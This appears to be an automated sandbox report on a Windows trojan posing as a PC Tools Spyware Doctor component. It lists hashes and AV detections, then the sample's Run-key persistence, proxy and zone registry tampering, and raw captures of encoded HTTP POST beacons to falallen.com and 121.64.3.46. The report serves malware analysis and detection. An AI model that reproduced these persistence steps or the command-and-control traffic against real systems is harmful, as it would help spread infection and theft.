Analysis Date2013-09-07 00:35:38
MD55061743eac986bb8cf4fdfffd1747a35
SHA188b9ef35c42cfc57ea2c114ca3d05228a5e7fd1d

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b1b186fbe841455d5ab777df9fbb713b sha1: 52624148ec4c9cb7b4f349acd0aa34fa04c28b7f size: 12288
Section.rdata md5: 0f343b0931126a20f133d67c2b018a3b sha1: 60cacbf3d72e1e7834203da608037b1bf83b40e8 size: 1024
Section.data md5: 7feed4281882843d2a662b4e7420c97e sha1: ca593f3e3e29f8a5a451fde7cca4f51f5dfe2007 size: 113152
Section.rsrc md5: d9ecc755db4ecf1e706c3e636dd5e141 sha1: 28529f10fb22be1f8d548d1657e0ad06139b50bd size: 5120
Timestamp2009-04-26 17:21:27
VersionLegalCopyright: Copyright © 2010 l PC Tools. All rights reserved. 2m
InternalName: tdama5
FileVersion: 7.0.0.61
CompanyName: PC Tools
LegalTrademarks:
Comments:
ProductName:
ProductVersion: 7.0.0.61
FileDescription: TMSpyware Doctor Component
OriginalFilename: tdama5
PEhash6f96f6b8fcf0f1605f0d9b5647b50cb2931db08a
AVaviraTR/Ginerez.SE
AVavgGeneric31.EBG

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS121.64.3.46
Winsock DNSfalallen.com
Winsock DNStopkio.com

Network Details:

DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSfalallen.com
Type: A
69.43.161.167
DNSphreeway.com
Type: A
107.20.206.69
DNStopkio.com
Type: A
DNStirefondn.com
Type: A
HTTP POSThttp://falallen.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://121.64.3.46/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 69.43.161.167:80
Flows TCP192.168.1.1:1032 ➝ 121.64.3.46:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   66616c61 6c6c656e 2e636f6d 0d0a436f   falallen.com..Co
0x000000b0 (00176)   6e74656e 742d4c65 6e677468 3a203334   ntent-Length: 34
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a6461 74613d2f 436a4566   he....data=/CjEf
0x00000100 (00256)   5a445376 78714369 4b306c34 304d7937   ZDSvxqCiK0l40My7
0x00000110 (00272)   53766a7a 2b456436 746b5a6d 417a3971   Svjz+Ed6tkZmAz9q
0x00000120 (00288)   32546e67 51512f6e 5a6c702f 70427376   2TngQQ/nZlp/pBsv
0x00000130 (00304)   5a436646 37726942 6b472f67 2b375643   ZCfF7riBkG/g+7VC
0x00000140 (00320)   432f3070 55336b4f 48703765 52634850   C/0pU3kOHp7eRcHP
0x00000150 (00336)   69596f39 39304d55 756a6755 57346276   iYo990MUujgUW4bv
0x00000160 (00352)   5449644e 2f6a5058 7547506a 61427a78   TIdN/jPXuGPjaBzx
0x00000170 (00368)   6c636335 6d704e30 31613674 2f516953   lcc5mpN01a6t/QiS
0x00000180 (00384)   58587770 7a39486d 306b7a39 66426661   XXwpz9Hm0kz9fBfa
0x00000190 (00400)   556e3130 782f474c 636f6652 6948344c   Un10x/GLcofRiH4L
0x000001a0 (00416)   76467341 69475946 7361696f 4d573037   vFsAiGYFsaioMW07
0x000001b0 (00432)   4b304533 726b6b33 4d655a55 79674465   K0E3rkk3MeZUygDe
0x000001c0 (00448)   4c477732 7331322b 6f504d4e 726e4a5a   LGw2s12+oPMNrnJZ
0x000001d0 (00464)   637a687a 5a387869 4e577535 54674f68   czhzZ8xiNWu5TgOh
0x000001e0 (00480)   71344f71 55533042 4d54644b 32625a79   q4OqUS0BMTdK2bZy
0x000001f0 (00496)   2f687833 546e6d47 7954464c 48684c63   /hx3TnmGyTFLHhLc
0x00000200 (00512)   52662b76 417a494f 424e6d76 34334344   Rf+vAzIOBNmv43CD
0x00000210 (00528)   4b325130 35415663 6d413832 4b685466   K2Q05AVcmA82KhTf
0x00000220 (00544)   5573732f 476f6c77 786c6d39 6b4c6e72   Uss/Golwxlm9kLnr
0x00000230 (00560)   6e6c4936 7034366e 3336642f 33346b70   nlI6p46n36d/34kp
0x00000240 (00576)   56563262 7151672f 513d3d              VV2bqQg/Q==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   3132312e 36342e33 2e34360d 0a436f6e   121.64.3.46..Con
0x000000b0 (00176)   74656e74 2d4c656e 6774683a 20333431   tent-Length: 341
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000d0 (00208)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x000000e0 (00224)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000000f0 (00240)   650d0a0d 0a646174 613d2f43 6a45665a   e....data=/CjEfZ
0x00000100 (00256)   44537678 7143694b 306c3430 4d793753   DSvxqCiK0l40My7S
0x00000110 (00272)   766a7a2b 45643674 6b5a6d41 7a397132   vjz+Ed6tkZmAz9q2
0x00000120 (00288)   546e6751 512f6e5a 6c702f70 4273765a   TngQQ/nZlp/pBsvZ
0x00000130 (00304)   43664637 7269426b 472f672b 37564343   CfF7riBkG/g+7VCC
0x00000140 (00320)   2f307055 336b4f48 70376552 63485069   /0pU3kOHp7eRcHPi
0x00000150 (00336)   596f3939 304d5575 6a675557 34627654   Yo990MUujgUW4bvT
0x00000160 (00352)   49644e2f 6a505875 47506a61 427a786c   IdN/jPXuGPjaBzxl
0x00000170 (00368)   6363356d 704e3031 6136742f 51695358   cc5mpN01a6t/QiSX
0x00000180 (00384)   5877707a 39486d30 6b7a3966 42666155   Xwpz9Hm0kz9fBfaU
0x00000190 (00400)   6e313078 2f474c63 6f665269 48344c76   n10x/GLcofRiH4Lv
0x000001a0 (00416)   46734169 47594673 61696f4d 5730374b   FsAiGYFsaioMW07K
0x000001b0 (00432)   30453372 6b6b334d 655a5579 6744654c   0E3rkk3MeZUygDeL
0x000001c0 (00448)   47773273 31322b6f 504d4e72 6e4a5a63   Gw2s12+oPMNrnJZc
0x000001d0 (00464)   7a687a5a 3878694e 57753554 674f6871   zhzZ8xiNWu5TgOhq
0x000001e0 (00480)   344f7155 5330424d 54644b32 625a792f   4OqUS0BMTdK2bZy/
0x000001f0 (00496)   68783354 6e6d4779 54464c48 684c6352   hx3TnmGyTFLHhLcR
0x00000200 (00512)   662b7641 7a494f42 4e6d7634 3343444b   f+vAzIOBNmv43CDK
0x00000210 (00528)   32513035 4156636d 4138324b 68546655   2Q05AVcmA82KhTfU
0x00000220 (00544)   73732f47 6f6c7778 6c6d396b 4c6e726e   ss/Golwxlm9kLnrn
0x00000230 (00560)   6c493670 34366e33 36642f33 346b7056   lI6p46n36d/34kpV
0x00000240 (00576)   56326271 51672f51 3d3d3d              V2bqQg/Q===


Strings